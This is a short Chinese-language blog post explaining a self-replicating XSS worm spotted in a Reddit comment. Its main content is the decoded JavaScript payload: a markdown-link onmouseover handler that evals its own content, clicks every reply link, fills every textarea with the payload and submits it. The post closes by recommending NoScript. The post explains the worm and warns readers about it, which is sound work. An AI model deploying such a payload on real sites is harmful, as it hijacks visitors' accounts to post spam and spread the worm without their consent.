刚才逛 r/programming,看到有人反应有个评论在不断地复制自己,不停的回复。在 firefox 里头,只要鼠标移到那段评论上面,就会寻找所有“回复”按钮,然后点击,然后在出来的所有 textarea 框里头填入自身,然后提交所有的回复。
这个神奇的评论(打开之后不要把鼠标移到正文上)实际代码是 URL 编码掉的,翻译过来就是:
nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/onmouseover=eval(unescape(this.innerHTML))//)";
elements = document.getElementsByTagName('a');
for (i = 0; i < elements.length; i++) {
if (elements[i].innerHTML == 'reply') {
$(elements[i]).click();
}
}
elements = document.getElementsByTagName('textarea');
for (i = 0; i < elements.length; i++)
elements[i].value = nonsense;
elements = document.getElementsByTagName('button');
for (i = 0; i < elements.length; i++) {
if (elements[i].innerHTML == 'save'
&& elements[i].style.display != 'none') {
$(elements[i]).click();
}
}
虽然我支持富网络应用(RIA),但是有的时候戴个安全套帽似乎很有必要啊。firefox 用户建议安装 noscript。